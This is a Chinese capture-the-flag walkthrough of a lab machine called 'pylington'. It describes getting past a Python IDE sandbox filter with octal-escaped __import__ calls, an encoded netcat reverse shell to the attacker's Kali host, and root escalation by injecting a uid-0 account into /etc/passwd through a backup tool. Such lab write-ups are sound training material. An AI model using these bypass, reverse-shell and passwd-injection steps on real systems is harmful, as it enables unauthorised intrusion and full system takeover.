主机信息
Kali:192.168.1.11
pylington:192.168.1.10
信息收集
使用Nmap扫描目标主机,发现开放了22、80两个端口
nmap -T4 -A -v 192.168.1.10
打开80端口的网站发现可能是一个在线的python运行环境
查看了首页源码发现没有获得有价值的信息
查看robots.txt文件,发现有3个目录
注册页打开后发现目前无法进行注册
通过/zbir7mn240soxhicso2z页面获取到一个用户名密码
然后我们在login页登录该账户
登录成功
登录成功之后,发现这是一个python的在线IDE
下载这个py文件查看
当我们输入下面的代码时,output提示沙箱检测到恶意程序
import os
然后我们使用__import__()
函数来进行测试,并把内容转换为16进制,看到可以成功执行命令
__import__('os').system('ls')
\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51
获取shell
接着尝试使用nc反弹一个shell
kali
nc -lvp 4321
pylington
exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\156\143\40\55\145\40\57\142\151\156\57\142\141\163\150\40\61\71\62\56\61\66\70\56\61\56\61\61\40\64\63\62\61\47\51")
然后获取一个可交互式shell
python -c 'import pty; pty.spawn("/bin/sh")'
进入到py的家目录后发i西安讯在一个typing的可执行文件
执行后发现需要我们快速输入下面的一句话就可以获得密码
the quick brown fox jumps over the lazy dog
使用得到的密码登录py的账户
查看py目录下的user.txt,解密后为user
查看目录发现有个备份文件的功能可以利用进行账户写入
提权
使用mkpasswd查看当前密码
mkpasswd -m sha-512
根据/etc/passwd编辑一个具有root权限的用户
NowSec:$6$OkYgAlB4hnt5M/oL$H53U2J8Zr36mwYe2NILa8zJ3na3rwAqhsBJc.m09gqtk.Cpwi3pufigxSUrDYCZTQ81DMOhFPw3OkEjZ6QWYC1:0:0:root:/root:/bin/bash
接着执行backup进行备份到/etc/passwd
备份完成后查看passwd文件发现已经添加成功
然后切换账户到NowSec1
最后进入root目录获取flag
加入我的星球
下方查看历史文章
扫描二维码
获取更多精彩
NowSec